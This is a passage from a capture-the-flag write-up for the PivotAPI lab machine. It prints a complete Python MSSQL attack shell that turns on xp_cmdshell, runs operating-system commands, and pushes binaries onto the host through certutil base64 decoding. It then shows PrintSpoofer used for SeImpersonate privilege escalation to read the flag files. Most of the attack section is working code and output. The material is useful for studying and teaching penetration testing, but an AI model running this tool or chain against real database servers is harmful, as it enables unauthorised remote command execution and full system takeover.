    return (username.rstrip(), computername.rstrip(), cwd.rstrip())


def upload(mssql, stored_cwd, local_path, remote_path):
    """Write <remote_path>.b64 chunk by chunk, decode it with certutil and
    compare the MD5 of the decoded file with the local one."""
    print("Uploading " + local_path + " to " + remote_path)
    cmd = 'type nul > "' + remote_path + '.b64"'          # create an empty .b64 file
    mssql.execute_query("EXEC xp_cmdshell '" + cmd + "'")

    with open(local_path, 'rb') as f:
        data = f.read()
        md5sum = hashlib.md5(data).hexdigest()
        # one long base64 string without line breaks, sliced into BUFFER_SIZE pieces
        b64enc_data = b"".join(base64.b64encode(data).split()).decode()

    print("Data length (b64-encoded): " + str(len(b64enc_data) / 1024) + "KB")
    for i in tqdm.tqdm(range(0, len(b64enc_data), BUFFER_SIZE), unit_scale=BUFFER_SIZE / 1024, unit="KB"):
        cmd = 'echo ' + b64enc_data[i:i + BUFFER_SIZE] + ' >> "' + remote_path + '.b64"'
        mssql.execute_query("EXEC xp_cmdshell '" + cmd + "'")

    # certutil decodes the base64 file into the real binary on the target
    cmd = 'certutil -decode "' + remote_path + '.b64" "' + remote_path + '"'
    mssql.execute_query("EXEC xp_cmdshell 'cd " + stored_cwd + " & " + cmd + " & echo %username%^|%COMPUTERNAME% & cd'")
    process_result(mssql)
    # integrity check: the remote MD5 must appear somewhere in certutil's output rows
    cmd = 'certutil -hashfile "' + remote_path + '" MD5'
    mssql.execute_query("EXEC xp_cmdshell 'cd " + stored_cwd + " & " + cmd + " & echo %username%^|%COMPUTERNAME% & cd'")
    if md5sum in [row[list(row)[-1]].strip() for row in mssql if row[list(row)[-1]]]:
        print("MD5 hashes match: " + md5sum)
    else:
        print("ERROR! MD5 hashes do NOT match!")


def shell():
    mssql = None
    stored_cwd = None
    try:
        mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
        print("Successful login: " + MSSQL_USERNAME + "@" + MSSQL_SERVER)

        print("Trying to enable xp_cmdshell ...")
        mssql.execute_query("EXEC sp_configure 'show advanced options',1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell',1;RECONFIGURE")

        # first command: learn who we are and where we are
        cmd = 'echo %username%^|%COMPUTERNAME% & cd'
        mssql.execute_query("EXEC xp_cmdshell '" + cmd + "'")
        (username, computername, cwd) = process_result(mssql)
        stored_cwd = cwd

        while True:
            # single quotes are doubled so the command survives inside the T-SQL string
            cmd = input("CMD " + username + "@" + computername + " " + cwd + "> ").rstrip("\n").replace("'", "''")
            if not cmd:
                cmd = "call"  # dummy cmd command
            if cmd.lower()[0:4] == "exit":
                mssql.close()
                return
            elif cmd[0:6] == "UPLOAD":
                # UPLOAD <local file> [<remote path>]; posix=False keeps backslashes intact
                upload_cmd = shlex.split(cmd, posix=False)
                if len(upload_cmd) < 3:
                    upload(mssql, stored_cwd, upload_cmd[1], stored_cwd + "\\" + upload_cmd[1])
                else:
                    upload(mssql, stored_cwd, upload_cmd[1], upload_cmd[2])
                cmd = "echo *** UPLOAD PROCEDURE FINISHED ***"
            # every command runs from the remembered directory so that cd persists
            mssql.execute_query("EXEC xp_cmdshell 'cd " + stored_cwd + " & " + cmd + " & echo %username%^|%COMPUTERNAME% & cd'")
            (username, computername, cwd) = process_result(mssql)
            stored_cwd = cwd

    except _mssql.MssqlDatabaseException as e:
        if e.severity <= 16:
            print("MSSQL failed: " + str(e))
        else:
            raise
    finally:
        if mssql:
            mssql.close()


shell()
sys.exit()

Now let's run the script.

┌───[us-free-1]─[10.10.14.3]─[root@parrot]─[/opt/printspoofer]
└──╼ [★]$ python dedsec.py 
/opt/printspoofer/dedsec.py:3: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated since Python 3.3, and in 3.10 it will stop working
  import _mssql
Successful login: sa@10.10.10.240
Trying to enable xp_cmdshell ...
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\Windows\system32> whoami
nt service\mssql$sqlexpress
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\Windows\system32> 

We got the shell; now let's try to UPLOAD the file into the TEMP directory.

┌───[us-free-1]─[10.10.14.3]─[root@parrot]─[/opt/printspoofer]
└──╼ [★]$ python dedsec.py 
/opt/printspoofer/dedsec.py:2: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated since Python 3.3, and in 3.10 it will stop working
  import _mssql
Successful login: sa@10.10.10.240
Trying to enable xp_cmdshell ...
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\Windows\system32> cd /temp
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> UPLOAD PrintSpoofer.exe C:\TEMP\printspoofer.exe
Uploading PrintSpoofer.exe to C:\TEMP\printspoofer.exe
Data length (b64-encoded): 35.3359375KB
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 40.0/40.0 [00:01<00:00, 24.50KB/s]
Longitud de entrada = 36208
EncodeToFile devolvi¾ Este archivo ya existe. 0x80070050 (WIN32: 80 ERROR_FILE_EXISTS)
CertUtil: -decode error del comando: 0x80070050 (WIN32: 80 ERROR_FILE_EXISTS)
CertUtil: Este archivo ya existe.
MD5 hashes match: 755af01d6f1c793d28275ec8b914687c
*** UPLOAD PROCEDURE FINISHED *** 
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> 

Now let's run the binary and read user.txt and root.txt.

CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> printspoofer.exe -i -c "powershell -c type C:\Users\3v4Si0N\Desktop\user.txt"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
4855ef51169f74e4d5d79befd933d719
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> 
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> printspoofer.exe -i -c "powershell -c type C:\users\cybervaca\Desktop\root.txt"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
b32c5e3ee389ee920f6aa1efa025048d
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> 

And we pwned it.

If you liked the writeup, support a student in getting the OSCP certification: Donation for OSCP

Resources

Topic           URL
CMD Watcher     https://www.kahusecurity.com/tools.html
API Monitor     http://www.rohitab.com/apimonitor
PrintSpoofer    https://github.com/dievus/printspoofer
Mssql_Shell.py  https://github.com/Alamot/code-snippets/blob/master/mssql/mssql_shell.py
This post is licensed under CC BY 4.0
